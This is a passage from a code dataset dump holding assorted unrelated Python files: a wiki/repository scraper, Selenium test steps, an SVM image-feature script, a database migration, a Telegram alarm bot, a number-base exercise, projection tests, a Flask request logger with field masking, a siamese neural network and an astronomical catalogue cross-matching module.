parseIssue(self):\r\n\r\n def downloadWikiPage(self):\r\n # self.titleDeed()\r\n # return\r\n # link = str(input())\r\n link = \"https://github.com/facebook/react\"\r\n os.system(\"git clone \" + link + \".git\")\r\n os.system(\"git clone \" + link + \".wiki.git\")\r\n self.getFiles(link[link.rfind(\"/\") + 1::].replace(' ', '') + \".wiki\")\r\n self.addCodeFiles(link[link.rfind(\"/\") + 1::].replace(' ', ''))\r\n # print(page)\r\n\r\n\r\nprint(\"---------------------------------------\")\r\nprint(\"------------- START -------------\")\r\n\r\nWikiParser()\r\n","sub_path":"wiki.py","file_name":"wiki.py","file_ext":"py","file_size_in_byte":5363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"471000321","text":"from selenium import webdriver \n# from shutil import which \nfrom selenium.webdriver.common.by import By \nfrom selenium.webdriver.support.ui import WebDriverWait \nfrom selenium.webdriver.support import expected_conditions \n \n@given(u'user is on the landing page') \ndef step_impl(context): \n context.browser.get(\"http://localhost:8081/\") \n \n \n@when(u'user clicks on launch button') \ndef step_impl(context): \n button = By.XPATH, '//button' \n WebDriverWait(context.browser,100).until( \n expected_conditions.presence_of_element_located(button) \n ) \n context.browser.find_element(*button).click() \n \n@then(u'user gets redirected to the dashboard') \ndef step_impl(context): \n wait = WebDriverWait(context.browser, 3) \n assert context.browser.current_url == \"http://localhost:8081/login\" \n","sub_path":"features/steps/sign_in_step.py","file_name":"sign_in_step.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"210188335","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 13 21:32:08 2018\n\n@author: zkapach\n\"\"\"\n\nimport _init_paths\nfrom core.train import get_training_roidb\nfrom core.config import cfg, cfg_from_file, cfg_from_list, get_output_dir, loadDatasetIndexDict,iconicImagesFileFormat\nfrom datasets.factory import get_repo_imdb\nfrom datasets.ds_utils import load_mixture_set,print_each_size,computeTotalAnnosFromAnnoCount,cropImageToAnnoRegion,roidbSampleHOG,roidbSampleImage\nimport os.path as osp\nimport datasets.imdb\nimport argparse\nimport pprint\nimport numpy as np\nimport sys,os,cv2,pickle\n# pytorch imports\nfrom datasets.pytorch_roidb_loader import 
RoidbDataset\nfrom numpy import transpose as npt\nfrom ntd.hog_svm import plot_confusion_matrix, extract_pyroidb_features,appendHOGtoRoidb,split_data, scale_data,train_SVM,findMaxRegions\n\ndef parse_args():\n \"\"\"\n Parse input arguments\n \"\"\"\n parser = argparse.ArgumentParser(description='Test loading a mixture dataset')\n parser.add_argument('--cfg', dest='cfg_file',\n help='optional config file',\n default=None, type=str)\n parser.add_argument('--setID', dest='setID',\n help='which 8 digit ID to read from',\n default='11111111', type=str)\n parser.add_argument('--repeat', dest='repeat',\n help='which repeat to read from',\n default='1', type=str)\n parser.add_argument('--size', dest='size',\n help='which size to read from',\n default=250, type=int)\n parser.add_argument('--save', dest='save',\n help='save some samples with bboxes visualized?',\n action='store_true')\n parser.add_argument('--rand', dest='randomize',\n help='randomize (do not use a fixed seed)',\n action='store_true')\n parser.add_argument('--model', dest='model',\n help='give the path to a fit model',\n default=None, type=str)\n\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n args = parser.parse_args()\n return args\n\ndef get_bbox_info(roidb,size):\n areas = np.zeros((size))\n widths = np.zeros((size))\n heights = np.zeros((size))\n actualSize = 0\n idx = 0\n for image in roidb:\n if image['flipped'] is True: continue\n bbox = image['boxes']\n for box in bbox:\n actualSize += 1\n widths[idx] = box[2] - box[0]\n heights[idx] = box[3] - box[1]\n assert widths[idx] >= 0,\"widths[{}] = {}\".format(idx,widths[idx])\n assert heights[idx] >= 0\n areas[idx] = widths[idx] * heights[idx]\n idx += 1\n return areas,widths,heights\n\n\nif __name__ == '__main__':\n args = parse_args()\n\n print('Called with args:')\n print(args)\n\n if args.cfg_file is not None:\n cfg_from_file(args.cfg_file)\n\n print('Using config:')\n pprint.pprint(cfg)\n\n if not args.randomize:\n np.random.seed(cfg.RNG_SEED)\n\n setID = args.setID\n repeat = args.repeat\n size = args.size\n \n roidb,annoCount = load_mixture_set(setID,repeat,size)\n numAnnos = computeTotalAnnosFromAnnoCount(annoCount)\n\n print(\"\\n\\n-=-=-=-=-=-=-=-=-\\n\\n\")\n print(\"Report:\\n\\n\")\n print(\"Mixture Dataset: {} {} {}\\n\\n\".format(setID,repeat,size))\n\n print(\"number of images: {}\".format(len(roidb)))\n print(\"number of annotations: {}\".format(numAnnos))\n print(\"size of roidb in memory: {}kB\".format(len(roidb) * sys.getsizeof(roidb[0])/1024.))\n print(\"example roidb:\")\n for k,v in roidb[0].items():\n print(\"\\t==> {},{}\".format(k,type(v)))\n print(\"\\t\\t{}\".format(v))\n\n print(\"computing bbox info...\")\n areas, widths, heights = get_bbox_info(roidb,numAnnos)\n\n print(\"ave area: {} | std. area: {}\".format(np.mean(areas),np.std(areas,dtype=np.float64)))\n print(\"ave width: {} | std. width: {}\".format(np.mean(widths),np.std(widths,dtype=np.float64)))\n print(\"ave height: {} | std. 
height: {}\".format(np.mean(heights),np.std(heights,dtype=np.float64)))\n prefix_path = cfg.IMDB_REPORT_OUTPUT_PATH\n if osp.exists(prefix_path) is False:\n os.makedirs(prefix_path)\n\n path = osp.join(prefix_path,\"areas.dat\")\n np.savetxt(path,areas,fmt='%.18e',delimiter=' ')\n path = osp.join(prefix_path,\"widths.dat\")\n np.savetxt(path,widths,fmt='%.18e',delimiter=' ')\n path = osp.join(prefix_path,\"heights.dat\")\n np.savetxt(path,heights,fmt='%.18e',delimiter=' ')\n\n \n print(\"-=\"*50)\n\n clsToSet = loadDatasetIndexDict()\n\n print(\"as pytorch friendly \")\n\n pyroidb = RoidbDataset(roidb,[0,1,2,3,4,5,6,7],\n loader=roidbSampleHOG,\n transform=None)\n \n print('this is the annocount', annoCount)\n\n l_feat,l_idx,y = extract_pyroidb_features(pyroidb, 'hog', clsToSet,\\\n spatial_size=(32, 32),hist_bins=32, \\\n orient=9, pix_per_cell=8, cell_per_block=2, \\\n hog_channel=0)\n\n train_size = 300\n test_size = 300\n\n\n X_train, X_test, y_train, y_test, X_idx = split_data(train_size, test_size, \\\n l_feat,l_idx, y,\\\n clsToSet)\n print(X_train.shape)\n print(y_train.shape)\n\n if args.model is not None:\n model = pickle.load(open(args.model,\"rb\"))\n else:\n model = train_SVM(X_train,y_train)\n pickle.dump(model,open(iconicImagesFileFormat().format(\"model.pkl\"),\"wb\"))\n\n # print(\"accuracy on test data {}\".format(model.score(X_test,y_test)))\n\n \"\"\"\n -> below is the raw output for x_test; we want the max \"k\" values \n from each dataset (along the columns) from ~1000 images of each dataset\n -> a good \"k\" is 10\n -> print the image paths to a file\n -> use the format given below\n -> TODO: write the \"findMaxRegions\" function in \"hog_svm.py\"\n \"\"\"\n\n # rawOutputs = np.matmul(model.coef_,npt(X_test)) + model.intercept_[:,np.newaxis]\n rawOutputs = model.decision_function(X_test)\n\n print(rawOutputs)\n print(rawOutputs.shape)\n \n fileDir = cfg.PATH_TO_NTD_OUTPUT\n if not osp.exists(fileDir):\n os.makedirs(fileDir)\n \n fileName = osp.join(fileDir,\\\n \"{}_{}_{}.txt\".format(setID,repeat,size))\n topK = 10\n fn = open(fileName,\"w\")\n maxRegionsStr = findMaxRegions(topK,pyroidb,rawOutputs,X_idx,clsToSet)\n fn.write(maxRegionsStr)\n fn.close()\n \n \n '''\nargparse.ArgumentParser:\nInput: (description='create the mixture datasets.'), Output: parser\n\nnp.zeros\nInput: (size), Output: areas\n\nnp.zeros\nInput: (size), Output: width\n \nnp.zeros\nInput: (size), Output: heights\n\nload_mixture_set\nInput: (setID,repeat,size), Output: roidb, annoCount\n\ncomputeTotalAnnosFromAnnoCount\n Input: (annoCount), Output: numAnnos\n\nget_bbox_info\nInput: roidb, numAnnos, Output: areas, widths, heights\n\n\npyroidb = RoidbDataset\nInput: (roidb,[0,1,2,3,4,5,6,7], loader=roidbSampleHOG, transform=None), Output: pyroidb\n\nextract_pyroidb_features\nInput: (pyroidb, 'hog', clsToSet,\\spatial_size=(32, 32),hist_bins=32, \\orient=9, pix_per_cell=8, cell_per_block=2, \\hog_channel=0)\nOutput: l_feat,l_idx,y\n\ntrain_SVM\nInput: (X_train,y_train), Output: model\n\nnp.matmul\nInput: (model.coef_,npt(X_test)) + model.intercept_.shape)\nOutput: rawOutputs\n\n osp.join\nInput: (cfg.PATH_TO_NTD_OUTPUT,\\\n \"{}_{}_{}.txt\".format(setID,repeat,size))\nOutput: fileName\n\nopen\nInput: (fileName,\"r\"),\nOutput: fn\n'''\n \n","sub_path":"tools/iconicImagesHOG.py","file_name":"iconicImagesHOG.py","file_ext":"py","file_size_in_byte":7777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"159340949","text":"\"\"\"change user.email to 
joined_at\n\nRevision ID: 63b7e055decf\nRevises: 0d18e7e5d6d4\nCreate Date: 2020-10-27 02:16:15.229659\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '63b7e055decf'\ndown_revision = '0d18e7e5d6d4'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('user', schema=None) as batch_op:\n batch_op.drop_column('email')\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('user', schema=None) as batch_op:\n batch_op.add_column(sa.Column('email', sa.VARCHAR(length=50), nullable=True))\n\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/63b7e055decf_change_user_email_to_joined_at.py","file_name":"63b7e055decf_change_user_email_to_joined_at.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"24023713","text":"#!/usr/bin/env python3\n\nimport json\nimport os\nimport sys\n\nimport mysql.connector as mysql\nimport telegram\nimport influx\nfrom mysql.connector import errorcode\n\nfrom base import Session\nfrom user import User\nfrom alarm import Alarm\nfrom log import Log\n\nwith open(os.path.join(sys.path[0], \"config.json\"), \"r\") as f:\n jsondata = json.load(f)\n token = jsondata[\"token\"]\n\n\ndef add_user(username, chat_id):\n if not Session().query(User).filter(User.chat_id == chat_id).first():\n user = User(username, chat_id)\n user.save()\n send_alarm_text(\"Neuer Benutzer {}\".format(username))\n return user\n\n\ndef is_user_blocked(chat_id):\n session = Session()\n user = session.query(User).filter(User.chat_id == chat_id).first()\n session.close()\n return user.blocked\n\n\ndef get_alarm(id):\n session = Session()\n alarm = session.query(Alarm).filter(Alarm.id == id).first()\n session.close()\n return alarm\n\n\ndef get_alarm_by_message(message):\n session = Session()\n message = \"%{}%\".format(message)\n alarm = session.query(Alarm).filter(Alarm.message.like(message)).first()\n session.close()\n return alarm\n\n\ndef get_list_alarms():\n session = Session()\n alarms = session.query(Alarm).all()\n session.close()\n return alarms\n\n\ndef get_list_alarms_active():\n session = Session()\n alarms = session.query(Alarm).filter(Alarm.active).all()\n session.close()\n return alarms\n\n\ndef get_list_alarms_inactive():\n session = Session()\n alarms = session.query(Alarm).filter(Alarm.active == False).all()\n session.close()\n return alarms\n\n\ndef get_user_by_name(name):\n session = Session()\n name = \"%{}%\".format(name)\n user = session.query(User).filter(User.name.like(name)).first()\n session.close()\n return user\n\n\ndef get_list_users():\n session = Session()\n users = session.query(User).all()\n session.close()\n return users\n\n\ndef get_list_user_active():\n session = Session()\n # only active users that are not blocked should receive alarms\n users = session.query(User).filter(User.active).filter(User.blocked == False).all()\n session.close()\n return users\n\n\ndef get_list_user_inactive():\n session = Session()\n users = session.query(User).filter(User.active == False).all()\n session.close()\n return users\n\n\ndef log_alarm(alarm):\n log = Log(alarm)\n log.save()\n\n\ndef send_alarm(alarm):\n log_alarm(alarm)\n send_alarm_text(alarm.message)\n\n\ndef send_alarm_text(text):\n for user in get_list_user_active():\n send(text, user)\n\n\ndef send(msg, user):\n bot = 
telegram.Bot(token=token)\n bot.sendMessage(chat_id=user.chat_id, text=msg)\n\n\ndef send_alarm_activated(alarm):\n if alarm.active:\n send_alarm(alarm)\n influx.logAlarm(alarm.message)\n\n\ndef get_last_alarm():\n session = Session()\n log = session.query(Log).order_by(Log.time.desc()).first()\n session.close()\n return log\n","sub_path":"roboteralarm.py","file_name":"roboteralarm.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"28639424","text":"número = int(input('Digite um número inteiro: '))\nprint('''Escolha uma das bases para conversão:\n[ 1 ] converter para BINÁRIO\n[ 2 ] converter para OCTAL\n[ 3 ] converter para HEXADECIMAL''')\nopçãoDeConversão = int(input('Sua opção: '))\nif opçãoDeConversão == 1:\n print('{} convertido para BINÁRIO é igual a {}.'.format(número, bin(número)[2:]))\nelif opçãoDeConversão == 2:\n print('{} convertido para OCTAL é igual a {}.'.format(número, oct(número)[2:]))\nelif opçãoDeConversão == 3:\n print('{} convertido para OCTAL é igual a {}.'.format(número, hex(número)[2:]))\nelse:\n print('Opção inválida. Tente novamente.')\n","sub_path":"Exerciciospython2/Condicoes Aninhadas/e037.py","file_name":"e037.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"606464590","text":"\"\"\" Tests for `yatsm.gis.projections`\n\"\"\"\nimport pytest\n\nfrom yatsm.gis import projections\n\n\nparams = {\n 5070: {'datum': 'NAD83',\n 'lat_0': '23',\n 'lat_1': '29.5',\n 'lat_2': '45.5',\n 'lon_0': '-96',\n 'proj': 'aea',\n 'units': 'm',\n 'x_0': '0',\n 'y_0': '0'},\n 32619: {'datum': 'WGS84', 'proj': 'utm', 'units': 'm', 'zone': '19'},\n 4326: {'datum': 'WGS84', 'proj': 'longlat'},\n 3857: {'a': '6378137',\n 'b': '6378137',\n 'k': '1.0',\n 'lat_ts': '0.0',\n 'lon_0': '0.0',\n 'nadgrids': '@null',\n 'proj': 'merc',\n 'units': 'm',\n 'x_0': '0.0',\n 'y_0': '0'},\n 6491: {'ellps': 'GRS80',\n 'lat_0': '41',\n 'lat_1': '42.68333333333333',\n 'lat_2': '41.71666666666667',\n 'lon_0': '-71.5',\n 'proj': 'lcc',\n 'units': 'm',\n 'x_0': '200000',\n 'y_0': '750000'}\n}\n\n\n@pytest.mark.parametrize(('code', 'params'), list(params.items()))\ndef test_crs_parameters(code, params):\n _params = projections.crs_parameters(code)\n assert _params == params\n\n\n@pytest.mark.parametrize('code', [-9999, 0])\ndef test_crs_parameters_fail(code):\n with pytest.raises(ValueError) as exc:\n projections.crs_parameters(code)\n assert 'Cannot find EPSG code' in str(exc)\n","sub_path":"tests/gis/test_gis_projections.py","file_name":"test_gis_projections.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"195063188","text":"# coding: utf-8\n\nimport logging\nimport logging.config\nfrom logging import (\n INFO, getLogger, getLevelName\n)\nimport time\n\nimport simplejson as json\n\nclass SensitiveDataFilter(logging.Filter):\n\n def filter(self, record):\n msg = record.msg\n try:\n message = json.loads(msg)\n except (ValueError, TypeError):\n pass\n else:\n mask_sensitive(message)\n record.msg = json.dumps(message)\n return True\n\n\ndef init_logger(app):\n logging.config.dictConfig(app.config['LOGGING'])\n\n\ndef send_log(logger_name, data, log_level=INFO):\n if isinstance(log_level, str):\n log_level = getLevelName(log_level)\n\n _logger = getLogger(logger_name)\n\n message = json.dumps(data)\n 
_logger.log(log_level, message, extra=data)\n\n\ndef dump_request():\n from flask import request, g\n\n data = {\n 'method': request.method,\n 'host': request.host,\n 'path': request.path,\n 'remote_addr': request.headers.get('X-Real-IP', '') or request.remote_addr,\n 'elapse_time': int((time.time() - g.start) * 1000),\n 'status_code': g.status_code,\n 'request_id': g.request_id,\n 'session': g.session\n }\n\n req_args = getattr(request, 'values', 'json')\n if req_args:\n req_args = {k: v for k, v in req_args.items()}\n else:\n req_args = {}\n data.update(req_args=req_args, resp_data=g.resp_data)\n\n return data\n\n\ndef log_request():\n req_data = dump_request()\n send_log('ots', req_data)\n\n\ndef mask_sensitive(d):\n for k, v in d.iteritems():\n if isinstance(v, dict):\n mask_sensitive(v)\n else:\n FILEDS = ('password', 'id_card', 'id_no', 'delta')\n MASK = '*' * 8\n if k in FILEDS and v:\n d[k] = MASK\n","sub_path":"gapi/app/libs/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"627336743","text":"import torch.nn as nn\nimport torch\n\nimport numpy as np\n\n__all__ = ['SiameseNetwork']\n\nclass BranchNetwork(nn.Module):\n \"\"\"\n Brach network\n \"\"\"\n def __init__(self):\n \"\"\"\n Input image size 180 x 320 (h x w)\n \"\"\"\n super(BranchNetwork, self).__init__()\n layers = []\n in_channels = 1\n layers += [nn.Conv2d(in_channels, 4, kernel_size=7, stride=2, padding=3)]\n layers += [nn.LeakyReLU(0.1, inplace=True)]\n\n layers += [nn.Conv2d(4, 8, kernel_size=5, stride=2, padding=2), nn.ReLU(inplace=True)]\n\n layers += [nn.Conv2d(8, 16, kernel_size=3, stride=2, padding=1), nn.ReLU(inplace=True)]\n\n layers += [nn.Conv2d(16, 32, kernel_size=3, stride=2, padding=1), nn.ReLU(inplace=True)]\n\n layers += [nn.Conv2d(32, 16, kernel_size=3, stride=2, padding=1), nn.ReLU(inplace=True)]\n\n self.network = nn.Sequential(*layers)\n self.fc = nn.Sequential(*[nn.Linear(6 * 10 * 16, 16)])\n\n def forward(self, x):\n x = self.network(x)\n x = x.view(x.size(0), -1)\n x = self.fc(x)\n return x\n\nclass SiameseNetwork(nn.Module):\n \"\"\"\n siamese network has left and right branches\n \"\"\"\n def __init__(self, network):\n super(SiameseNetwork, self).__init__()\n self.network = network\n\n def _forward_one_branch(self, x):\n x = self.network(x)\n x = x.view(x.shape[0], -1)\n\n # L2 norm in dimension 1 (each row)\n x = nn.functional.normalize(x, p=2)\n return x\n\n def forward(self, x1, x2):\n x1 = self._forward_one_branch(x1)\n x2 = self._forward_one_branch(x2)\n return x1, x2\n\n def feature(self, x):\n return self._forward_one_branch(x)\n\n def feature_numpy(self, x):\n feat = self.feature(x)\n feat = feat.data\n feat = feat.cpu()\n feat = feat.numpy()\n \n if len(feat.shape) == 4:\n # N x C x 1 x 1\n \n feat = np.squeeze(feat, axis=(2, 3))\n else:\n # N x C\n assert len(feat.shape) == 2\n return feat\n\n\ndef ut():\n from contrastive_loss import ContrastiveLoss\n branch = BranchNetwork()\n siamese_network = SiameseNetwork(branch)\n\n criterion = ContrastiveLoss(margin=1.0)\n\n N = 2\n x1 = torch.randn(N, 1, 180, 320)\n x2 = torch.randn(N, 1, 180, 320)\n y1 = torch.randn(N, 1)\n y_zero = torch.zeros(N, 1)\n y_ones = torch.ones(N, 1)\n label = torch.where(y1 > 0, y_ones, y_zero)\n label = torch.squeeze(label)\n # print(label.shape)\n\n f1, f2 = siamese_network(x1, x2)\n print('f1 shape {}'.format(f1.shape))\n loss = criterion(f1, f2, label)\n print(loss)\n\nif __name__ 
== '__main__':\n ut()\n\n\n\n\n\n\n","sub_path":"Perspective Transformation/python_codes/deep/siamese.py","file_name":"siamese.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"419137020","text":"# Make page a clearance page\n\n\ndef makePageClearance(make_page_clearance, inv_dict, inventory_write_IDs, IDs_on_site, new_ID, remove_page):\n for r in make_page_clearance:\n old = r\n new = old.replace('sale', '') + 'clearance'\n if new not in inv_dict:\n inv_dict[new] = []\n if new not in inventory_write_IDs:\n inventory_write_IDs.append(new)\n if new not in IDs_on_site:\n if old not in new_ID:\n new_ID.append(old)\n if old not in remove_page:\n remove_page.append(old)\n if new in remove_page:\n remove_page.remove(new)\n\n for s in inv_dict[old]:\n s[0] = new\n inv_dict[new].append(s)\n\n return inv_dict, inventory_write_IDs, new_ID, remove_page\n","sub_path":"makePageClearance.py","file_name":"makePageClearance.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"46276069","text":"\n\"\"\"\nPython implementation of the likelihood ratio method for\ncross-matching two astronomical catalogues.\n\nReferences: Sutherland & Saunders, 1992; Georgakakis & Nandra 2011\n\nauthor: A.Ruiz & A.Georgakakis\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom io import open\n\nimport os\nfrom copy import deepcopy\n\ntry:\n # python 3\n from contextlib import redirect_stdout\nexcept:\n # python 2\n from contextlib2 import redirect_stdout\n\nfrom astropy import log\nfrom astropy import units as u\nfrom astropy.table import Table, Column, join, vstack, unique\nimport numpy as np\n\nfrom .priors import Prior #, BKGpdf\nfrom .priorsND import PriorND, BKGpdf\nfrom .match import BaseMatch\n\nimport sys\n\n\nclass LRMatch(BaseMatch):\n \"\"\"\n This class defines a crossmatching of two catalogues. It is initialized\n by passing two ``Catalogue`` objects:\n one for the primary catalogue (e.g. a list of X-ray sources) and another\n one for the secondary catalogue (e.g. a list of optical sources). The\n secondary catalogue must contain auxiliary data (e.g. magnitudes).\n\n Parameters\n ----------\n pcat : ``Catalogue``\n Primary catalogue.\n scat : ``Catalogue``\n Secondary catalogue.\n \"\"\"\n\n _lr_all = None\n _bkg = None\n _cutoff_column = 'LR_BEST'\n\n ### Class Properties\n @property\n def lr(self):\n if self._lr_all is None:\n raise AttributeError('Match has not been performed yet!')\n else:\n return self._lr_all\n\n @property\n def bkg(self):\n if self._bkg is None:\n raise AttributeError('Match has not been performed yet!')\n else:\n return self._bkg\n\n @property\n def scat(self):\n return self.scats[0]\n\n ### Public Methods\n def run(self,\n radius=6*u.arcsec,\n mags=None,\n magmin=10.0,\n magmax=30.0,\n magbinsize=0.5,\n priors=None,\n prior_method='random',\n random_numrepeat=200,\n poserr_dist=\"rayleigh\",\n prob_ratio_secondary=0.5,\n seed=None \n ):\n \"\"\"\n Performs the actual LR crossmatch between the two catalogues. 
The\n        method identifies all possible counterparts of the primary catalogue\n        in the secondary catalogue within `radius` and estimates the\n        corresponding LR for each counterpart in each available magnitude.\n\n        Parameters\n        ----------\n        radius : Astropy ``Quantity``, optional\n            Distance limit for searching counterparts in the secondary\n            catalogue in angular units. Defaults to 6 arcsec.\n        mags : `list`, optional\n            Magnitude columns of the secondary catalogue (or combinations\n            of them) to be used in the LR calculation.\n        magmin : `float`, optional\n            Lower magnitude limit to be considered in the LR calculation.\n            Defaults to 10.0.\n        magmax : `float`, optional\n            Upper magnitude limit to be considered in the LR calculation.\n            Defaults to 30.0.\n        magbinsize : `float`, optional\n            Magnitude bin width when estimating magnitude distributions.\n            Defaults to 0.5.\n        prob_ratio_secondary : `float`, optional\n            Minimum probability ratio between the best and other matches for a\n            primary source to be considered as a secondary match.\n            Defaults to 0.5.\n        priors : ``PriorND`` object or `None`, optional\n            Predefined Prior object to be used in the cross-match. It has to\n            be defined consistently with the magnitudes of the secondary\n            catalogue. If `None`, the method set in `prior_method` is used to\n            build the priors. Defaults to `None`.\n        prior_method : 'random' or 'mask', optional\n            Method to be used in the prior estimation.\n            The a priori probability is determined as follows. First, we\n            estimate the magnitude distribution of the spurious matches and it\n            is scaled to the area within which we search for counterparts.\n            This is then subtracted from the magnitude distribution of all\n            counterparts in the secondary catalogue to determine the magnitude\n            distribution of the true associations.\n            The 'mask' method removes all sources in the\n            secondary catalogue within one arcmin of the positions of the\n            primary sources. The magnitude distribution of the remaining\n            sources, divided by the remaining catalogue area, corresponds to\n            the probability distribution of a spurious match per magnitude\n            and per square degree.\n            The 'random' method generates a catalogue of random\n            positions away from the primary sources and searches for all\n            available counterparts in the secondary catalogue. The magnitude\n            distribution of these sources corresponds to the probability\n            distribution of a spurious match.\n            Defaults to 'random'.\n        random_numrepeat : `int`, optional\n            Number of random realisations when prior_method='random'.\n            Defaults to 200.\n        poserr_dist : 'rayleigh' or 'normal', optional\n            Probability distribution that describes the radial distance\n            between two sources with positional errors.\n            Defaults to 'rayleigh'.\n        \"\"\"\n        assert poserr_dist.lower() in ['normal', 'rayleigh'], \"poserr_dist should be one of normal, rayleigh\"\n        assert prior_method.lower() in ['random', 'mask'], \"prior_method should be one of random, mask\"\n\n        self.poserr_dist = poserr_dist\n        self.random_numrepeat = random_numrepeat\n\n        if self.scat.mags is None:\n            raise ValueError('Secondary catalogue must contain '\n                             'auxiliary data (e.g. 
magnitudes).')\n\n        self.radius = radius\n\n        log.info('Searching for match candidates within {}...'.format(self.radius))\n        mcat_pidx, mcat_sidx, mcat_d2d = self._candidates()\n\n        log.info('Calculating priors...')\n        if not priors:\n            self._priors = self._calc_priors(\n                mcat_sidx, mags, magmin, magmax, magbinsize, prior_method, seed\n            )\n        else:\n            self._priors = priors\n\n        self._bkg = BKGpdf(self.scat, mags, magmin, magmax, magbinsize)\n        log.info('Calculating likelihood ratios for match candidates...')\n\n        if len(mcat_pidx) > 0 and len(mcat_sidx) > 0:\n            lr, self._lr_all = self._likelihood_ratio(mcat_pidx, mcat_sidx, mcat_d2d)\n\n            log.info('Sorting and flagging match results...')\n            match = self._final_table(lr, prob_ratio_secondary)\n        else:\n            return None\n\n        return match\n\n    # Override the BaseMatch method\n    def stats(\n        self,\n        match,\n        cutoffstep=0.01,\n        mincutoff=-3,\n        maxcutoff=1.0,\n        plot_to_file=None,\n        only_primary=True\n    ):\n        \"\"\"\n        Calculates and stores match statistics (completeness and reliability)\n        for a range of LR thresholds. This can be used later to select the\n        optimal threshold.\n        \"\"\"\n        # parametrise common statistics/definitions that\n        # quantify the reliability and completeness of\n        # the cross-match.\n        # Produce table with summary of results\n        # also include some reference ...? (e.g. Luo et al 2010???)\n\n        if only_primary:\n            # We use only primary matches\n            mask = match['match_flag'] == 1\n        else:\n            # All matches\n            mask = match['ncat'] == 2\n\n        lrdata = match[mask]\n\n        stats = Table()\n        stats['cutoff'] = np.arange(mincutoff, maxcutoff, cutoffstep)\n        stats['completeness'] = np.nan\n        stats['reliability'] = np.nan\n\n        for i, lrlim in enumerate(stats['cutoff']):\n            rel_good = lrdata['REL_BEST'][lrdata[self._cutoff_column] > 10**lrlim]\n            #CHILR[i] = float(rel_good.size)/len(self.pcat) # sample completeness\n            #stats['CHILR'][i] = np.sum(rel_good)/len(self.pcat) # completeness\n            stats['completeness'][i] = float(rel_good.size)/len(lrdata)  # completeness (AGE)\n            stats['reliability'][i] = np.mean(rel_good)  # reliability\n\n        stats['error_rate'] = 1 - stats['reliability']\n        stats['CR'] = stats['completeness'] + stats['reliability']\n\n        if plot_to_file is not None:\n            self._plot_stats(stats, plot_to_file)\n\n        return stats\n\n    # Overrides the BaseMatch method\n    def stats_rndmatch(\n        self,\n        match,\n        match_rnd,\n        ncutoff=101,\n        mincutoff=0.0,\n        maxcutoff=10.0,\n        plot_to_file=None\n    ):\n        \"\"\"\n        Calculates match statistics (completeness and reliability), using a\n        random match, for a range of LR thresholds. 
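The\n        error rate is derived from a cross-match against a randomised version\n        of the primary catalogue, so it measures purely chance associations. 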
This can be used later to\n        select the optimal threshold.\n        \"\"\"\n        # TODO: LR output should be improved to simplify these selection masks\n        mask = np.logical_and(match['ncat'] == 2, match['match_flag'] == 1)\n        p_any0 = match[self._cutoff_column][mask]\n\n        # Add sources with no matches\n        size = len(np.where(match['ncat'] == 1)[0]) - len(p_any0)\n        p_any0 = np.concatenate((np.array(p_any0), np.zeros(size)))\n\n        mask = np.logical_and(match_rnd['ncat'] == 2, match_rnd['match_flag'] == 1)\n        p_any0_offset = match_rnd[self._cutoff_column][mask]\n\n        # Add sources with no matches\n        size = len(np.where(match_rnd['ncat'] == 1)[0]) - len(p_any0_offset)\n        p_any0_offset = np.concatenate(\n            (np.array(p_any0_offset), np.zeros(size))\n        )\n\n        cutoffs = np.linspace(mincutoff, maxcutoff, num=ncutoff)\n\n        stats = Table()\n        stats['cutoff'] = cutoffs\n        stats['completeness'] = [(p_any0 > c).mean() for c in cutoffs]\n        stats['error_rate'] = [(p_any0_offset > c).mean() for c in cutoffs]\n        stats['reliability'] = 1 - stats['error_rate']\n        stats['CR'] = stats['completeness'] + stats['reliability']\n\n        return stats\n\n    ### Internal Methods\n    def _candidates(self):\n        \"\"\"\n        Identify all possible counterparts for the primary sources in the\n        secondary catalogue within `self.radius`.\n\n        Returns\n        -------\n        pidx : numpy ``ndarray``\n            Indexes of the primary sources with counterparts in the\n            secondary catalogue.\n        sidx : numpy ``ndarray``\n            Indexes of the counterparts in the secondary catalogue.\n        d2d : numpy ``ndarray``\n            Distance between the primary source and the counterpart in the\n            secondary catalogue.\n        See the documentation of Astropy's ``search_around_sky`` tool for more\n        details about the output.\n        \"\"\"\n        pcoords = self.pcat.coords\n        scoords = self.scat.coords\n        pidx, sidx, d2d, _ = scoords.search_around_sky(pcoords, self.radius)\n        # print(pidx, sidx, d2d)\n        return pidx, sidx, d2d\n\n    def _calc_priors(self, sidx, mags, magmin, magmax, magbinsize, method, seed):\n        \"\"\"\n        Estimates the prior probability distribution for a source in the\n        primary catalogue having a counterpart in the secondary catalogue\n        with magnitude m.\n\n        The a priori probability is determined as follows. First, we estimate\n        the magnitude distribution of the spurious matches and it is scaled\n        to the area within which we search for counterparts. This is then\n        subtracted from the magnitude 